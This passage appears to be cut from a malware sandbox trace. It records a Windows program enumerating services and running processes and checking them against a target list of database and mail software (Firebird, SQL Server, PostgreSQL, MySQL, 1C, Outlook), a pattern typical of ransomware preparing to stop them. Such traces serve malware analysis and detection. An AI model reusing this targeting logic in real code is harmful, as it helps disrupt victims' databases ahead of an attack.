lpString2="CryptSvc") returned 1 [0265.409] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0265.409] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0265.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0265.409] lstrlenW (lpString="CscService") returned 10 [0265.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0265.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0265.409] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0265.409] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0265.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0265.409] lstrlenW (lpString="DcomLaunch") returned 10 [0265.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.410] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0265.410] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0265.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0265.410] lstrlenW (lpString="Dhcp") returned 4 [0265.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0265.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0265.410] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0265.410] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0265.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0265.410] lstrlenW (lpString="Dnscache") returned 8 [0265.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0265.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0265.410] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0265.410] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0265.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0265.410] lstrlenW (lpString="DPS") returned 3 [0265.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0265.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0265.410] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0265.410] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0265.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0265.410] lstrlenW (lpString="eventlog") returned 8 [0265.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0265.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0265.410] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0265.410] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0265.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0265.410] lstrlenW (lpString="EventSystem") returned 11 [0265.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0265.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0265.410] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0265.411] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0265.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0265.411] lstrlenW (lpString="gpsvc") returned 5 [0265.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0265.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0265.411] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0265.411] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0265.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0265.411] lstrlenW (lpString="LanmanWorkstation") returned 17 [0265.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0265.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0265.411] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0265.411] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0265.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0265.411] lstrlenW (lpString="lmhosts") returned 7 [0265.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0265.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0265.411] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0265.411] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0265.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0265.411] lstrlenW (lpString="MMCSS") returned 5 [0265.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0265.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0265.411] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0265.411] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0265.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0265.411] lstrlenW (lpString="MpsSvc") returned 6 [0265.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0265.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0265.411] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0265.411] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0265.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0265.411] lstrlenW (lpString="NlaSvc") returned 6 [0265.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0265.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0265.412] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0265.412] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0265.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0265.412] lstrlenW (lpString="nsi") returned 3 [0265.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0265.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0265.412] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0265.412] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0265.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0265.412] lstrlenW (lpString="PcaSvc") returned 6 [0265.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0265.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0265.412] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0265.412] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0265.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0265.412] lstrlenW (lpString="PlugPlay") returned 8 [0265.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0265.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0265.412] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0265.412] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0265.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0265.412] lstrlenW (lpString="Power") returned 5 [0265.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0265.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0265.412] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0265.412] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0265.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0265.412] lstrlenW (lpString="ProfSvc") returned 7 [0265.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0265.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0265.412] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0265.412] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0265.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0265.413] lstrlenW (lpString="RpcEptMapper") returned 12 [0265.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.413] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0265.413] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0265.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0265.413] lstrlenW (lpString="RpcSs") returned 5 [0265.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0265.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0265.413] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0265.413] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0265.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0265.413] lstrlenW (lpString="SamSs") returned 5 [0265.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0265.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0265.413] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0265.413] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0265.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0265.413] lstrlenW (lpString="Schedule") returned 8 [0265.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0265.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0265.413] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0265.413] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0265.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0265.413] lstrlenW (lpString="SENS") returned 4 [0265.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0265.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0265.413] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0265.413] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0265.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0265.413] lstrlenW (lpString="ShellHWDetection") returned 16 [0265.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.414] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0265.414] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0265.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0265.414] lstrlenW (lpString="Spooler") returned 7 [0265.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0265.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0265.414] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0265.414] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0265.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0265.414] lstrlenW (lpString="SysMain") returned 7 [0265.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0265.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0265.414] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0265.414] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0265.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0265.414] lstrlenW (lpString="Themes") returned 6 [0265.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0265.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0265.414] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0265.414] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0265.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0265.414] lstrlenW (lpString="TrkWks") returned 6 [0265.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0265.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0265.414] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0265.414] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0265.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0265.414] lstrlenW (lpString="UxSms") returned 5 [0265.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0265.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0265.414] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0265.414] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0265.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0265.415] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0265.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3cc [0265.416] Process32FirstW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.416] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.416] lstrlenW (lpString="System") returned 6 [0265.416] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0265.416] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0265.416] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0265.416] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0265.416] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0265.416] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0265.416] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0265.416] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.417] lstrlenW (lpString="smss.exe") returned 8 [0265.417] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0265.417] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.417] lstrlenW (lpString="csrss.exe") returned 9 [0265.417] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.417] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.417] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.417] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.417] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.417] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.417] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.418] lstrlenW (lpString="wininit.exe") returned 11 [0265.418] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0265.418] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0265.418] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0265.418] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0265.418] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0265.418] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0265.418] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0265.418] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.418] lstrlenW (lpString="csrss.exe") returned 9 [0265.418] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.418] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.418] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.418] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.418] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.418] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.418] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.418] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.419] lstrlenW (lpString="winlogon.exe") returned 12 [0265.419] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0265.419] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0265.419] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0265.419] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0265.419] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0265.419] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0265.419] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0265.419] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.419] lstrlenW (lpString="services.exe") returned 12 [0265.419] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0265.419] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0265.419] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0265.419] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0265.419] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0265.419] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0265.419] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0265.419] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.420] lstrlenW (lpString="lsass.exe") returned 9 [0265.420] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0265.420] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0265.420] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0265.420] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0265.420] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0265.420] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0265.420] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0265.420] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0265.420] lstrlenW (lpString="lsm.exe") returned 7 [0265.420] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0265.420] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0265.420] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0265.420] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0265.420] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0265.420] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0265.420] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0265.420] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.421] lstrlenW (lpString="svchost.exe") returned 11 [0265.421] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.421] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.421] lstrlenW (lpString="svchost.exe") returned 11 [0265.421] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.421] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.421] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.422] lstrlenW (lpString="svchost.exe") returned 11 [0265.422] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.422] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.422] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.422] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.422] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.422] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.422] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.422] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.422] lstrlenW (lpString="svchost.exe") returned 11 [0265.422] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.422] lstrlenW (lpString="svchost.exe") returned 11 [0265.422] Process32NextW (in: hSnapshot=0x3cc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.423] lstrlenW (lpString="audiodg.exe") returned 11 [0265.423] Process32NextW (in: 